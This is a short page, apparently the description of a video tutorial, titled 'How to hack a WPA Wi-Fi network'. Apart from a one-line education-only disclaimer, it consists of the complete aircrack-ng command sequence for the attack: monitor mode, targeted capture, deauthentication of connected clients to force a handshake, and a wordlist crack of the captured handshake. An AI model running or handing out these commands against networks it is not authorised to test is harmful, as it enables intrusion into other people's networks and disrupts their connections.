How to hack a WPA Wi-Fi network

Note: This video tutorial is only for the the education purposes! Cracking, or hacking WIFI is illegal! Commands: airmon-ng start wlan1 airodump-ng mon0 airodump-ng -c [channel] --bssid [BSSID] -w [file] mon0 aireplay-ng --deauth 5 -a [BSSID] -c [STATION] mon0 aircrack-ng [handshake] -w [wordlist]
Back to Top